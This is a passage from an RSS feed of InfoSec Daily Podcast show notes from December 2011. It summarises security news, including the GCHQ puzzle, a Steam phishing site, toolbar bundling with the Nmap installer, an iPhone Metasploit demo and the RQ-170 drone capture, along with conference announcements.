<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The signals intelligence agency set a puzzle at</span><a href="http://canyoucrackit.co.uk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">canyoucrackit.co.uk</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> in its attempt to drum up potential interest in a career at the spy centre from outside its traditional graduate programme. The three-part puzzle was broken independently by several people, but Dr Gareth Owen, a computer scientist and senior lecturer at the University of Greenwich in England, was the first to post a</span><a href="http://gchqchallenge.blogspot.com/2011/12/gchq-stage-1-commented-assembly-code-dr.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">detailed explanation</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of the crack.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The challenge involved making uncovering a code-word starting with a 16&#215;10 grid of paired hexadecimal numbers. The first stage involves recognising that the numbers are executable code (a decryption algorithm) as well as unpicking some steganography involving the image of the numbers. The second stage involves building a virtual computer to execute code that, when correctly done, outputs the link to the third stage.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The third stage involves finding the licence key to run a linked program. Finding the licence key involves decoding the program and seeing how it works. Three hidden numbers from the first two stages of the process are needed to get the final answer that reveals the keyword.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other amateur codebreakers who also tried their hand at the codebreaking challenge included John Graham-Cumming, the man behind the project to build Charles Babbage&#39;s Analytical Engine. Graham-Cumming also launched the successful petition for an apology from the British government for its persecution of Alan Turing.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/internet/3322974/inida-calls-for-facebookgoogle-remove-offensive-content"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/internet/3322974/inida-calls-for-facebookgoogle-remove-offensive-content</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Indian government is calling for Facebook, Google and other web firms to remove offensive content.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Communications Minister Kapil Sibal said any &quot;inflammatory&quot; and &quot;defamatory&quot; content covering religion and politics that could create social tension should be removed or the web giants, which also include Yahoo and YouTube, will face &quot;stern action&quot;. It is thought Sibal in particular objects to comments and images of Congress president Sonia Gandhi and Prime Minister Manmohan Singh.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;These websites have been told to be more vigilant towards such content and ensure that such objectionable matter is not used on the Internet,&quot; a senior official of the Department of Telecommunications told</span><a href="http://www.thehindu.com/news/national/article2690084.ece"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Hindu</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;They have been asked to inform the government of such controversial matter so that immediate remedial measures could be taken. We have asked them to actively screen and filter all such material before they are uploaded.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Facebook, which has 28 million users in India, said in a statement it &quot;will remove any content that violates our terms, which are designed to keep material that is hateful, threatening, incites violence or contains nudity off the service&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/Steam-s-Birthday-Celebrated-by-Phishers-238586.shtml"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/Steam-s-Birthday-Celebrated-by-Phishers-238586.shtml</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">English and German speaking Steam customers are advised to beware of a website that allegedly offers an anniversary upgrade. In reality, the site is carefully designed by phishers to steal the login details of unsuspecting users, reports</span><a href="http://sunbeltblog.blogspot.com/2011/12/steam-birthday-crashed-by-party-poopers.html?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed:+SunbeltBlog+%28GFI+Blog%29&amp;utm_content=Google+Reader"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">GFI</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Valve gives to you one of 1000 available Steam-gold-account upgrades which allow you to play all 72 games for free!&rdquo; reads the fake offer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the site (steambirthday.com) is well designed, most of the links being set up to point to legitimate Steam related locations, a big yellow </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">UPGRADE NOW</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> button that claims there are only 103 updates available will lead to a secondary malicious page that displays a form in which the victim is required to complete his log-in details.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the username, the password and the email address are provided, another form request a confirmation code received via email, this being the point where the crooks have everything they need to steal a Steam account.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;As the Steam-Project starten at September, 12th 2003 , no one had thaugt, that this system is that great. In a really short time our servers become more and more and today, there are more than thousand meters of them. The games became more and more, too. Today, we are on of the biggest companies with a great software to sell our multi-player games,&rdquo; reads a message on the main page of the phony site.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-539-nmap-malware-dnscrypt-international-checkout-gchq-india-facebook-steam/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3239/0/infosec-daily-podcast-episode-539.mp3" length="17832373" type="audio/mpeg" />
		<itunes:duration>0:37:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 539 for December 6, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 539 for December 6, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rodstad and Themson Mester
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.theregister.co.uk/2011/12/06/cnet_nmap_toolbar_wrapping_row/

	Cnet has come under fire for wrapping downloads of the popular Nmap network analysis tool and other open-source software packages with a toolbar of dubious utility.
	Nmap is a popular open-source network auditing and penetration-testing tool that allows sysadmins to run network troubleshooting and penetration tests. Over the last few days, users who have downloaded the tool from Cnet popular download.com site have been, by default, offered it in conjunction with the Babylon Toolbar.
	Sysadmins can opt out of receiving the toolbar, which changes their browsing experience, home page and default search engines, but they are clearly directed towards accepting the software, as a blog post by Sophos illustrates.
	Gordon Lyon (Fyodor), the developer of Nmap, has cried foul over the way the toolbar has been pushed, objecting in a post to the North American Network Operators&#39; Group (Nanog) mailing list (extract below).
	The problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn&#39;t put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them!
	Lyon added that consumers downloading VLC, the popular open-source media player software, are also being offered the Babylon toolbar, via what he described as a a &#34;Trojan installer&#34;.
	&#8230;.
	Source: &#160;http://www.readwriteweb.com/enterprise/2011/12/opendns-adds-encrypted-securit.php
	OpenDNS announced a technology preview today for Macs running their DNS services called DNSCrypt. Thin[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 538 &#8211; iPhone Exploit, Sentinel Lost, Amazon, Da Vinci, Zetas &amp; Nmap Malware</title>
		<link>http://www.isdpodcast.com/episode-538-iphone-exploit-sentinel-lost-amazon-da-vinci-zetas-nmap-malware</link>
		<comments>http://www.isdpodcast.com/episode-538-iphone-exploit-sentinel-lost-amazon-da-vinci-zetas-nmap-malware#comments</comments>
		<pubDate>Tue, 06 Dec 2011 01:55:17 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3235</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 538 for December 5, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 538 for December 5, 2011. &nbsp;</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ettercap-NG</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has just been updated and released&#8230; &nbsp;Lazarus is out!</span><br />
	<a href="http://ettercap.sourceforge.net/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://ettercap.sourceforge.net/</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://community.rapid7.com/community/metasploit/blog/2011/11/08/metasploit-framework-sighting-exploiting-iphone"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://community.rapid7.com/community/metasploit/blog/2011/11/08/metasploit-framework-sighting-exploiting-iphone</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many security researchers use the Metaploit Framework for security proof of concepts and demonstrations. The following video shows Charlie Miller,</span><a href="http://twitter.com/0xcharlie"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@0xcharlie</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, using Metasploit&#39;s Meterpreter to handle a session from an exploited iPhone. In this video, Charlie navigates the iPhone&#39;s file system and downloads files to his local computer. Charlie found a flaw which allowed him to bypass Apple&#39;s coding signing requirements, which allowed him to run arbitrary code on the iPhone.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><br />
	<a href="https://www.infosecisland.com/blogview/18536-Was-Irans-Downing-of-RQ-170-Related-to-the-Malware-Infection-at-Creech-AFB.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.infosecisland.com/blogview/18536-Was-Irans-Downing-of-RQ-170-Related-to-the-Malware-Infection-at-Creech-AFB.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><a href="http://www.washingtonpost.com/world/middle_east/iran-says-it-shot-down-unmanned-us-spy-plane/2011/12/04/gIQAHHNRSO_story.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Washington Post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has reported that Iran&#39;s cyber warfare unit took over the controls of a Lockheed Martin RQ-170 Sentinel stealth drone flying over Eastern Iran and landed it with minimal damage.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of this writing, the U.S. Air Force hasn&#39;t yet confirmed or denied the attack. I&#39;ve left a message with the on-call PA officer at Creech Air Force Base, which is the home of the 432d Wing which flies RQ-170 Sentinels according to this </span><a href="http://www.af.mil/information/factsheets/factsheet.asp?id=16001"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">factsheet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Creech Air Force Base, as you may recall, suffered a </span><a href="http://jeffreycarr.blogspot.com/2011/10/cybersecurity-issues-with-predators.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">malware infection</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of its Reaper and Predator Ground Control Stations last October. After Noah Shachtman broke the story, the Air Force issued a press release claiming that the malware was a simple &quot;credential stealer&quot; and not a &quot;keylogger&quot;, which is a distinction without a difference as I pointed out </span><a href="http://jeffreycarr.blogspot.com/2011/10/us-air-force-demonstrates-how-not-to.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Approximately one and a half months after the Air Force issued that statement, Iran claims to have successfully compromised the flying operations of one of its drones &#8211; possibly flown out of the same Air Force base.</span></p>
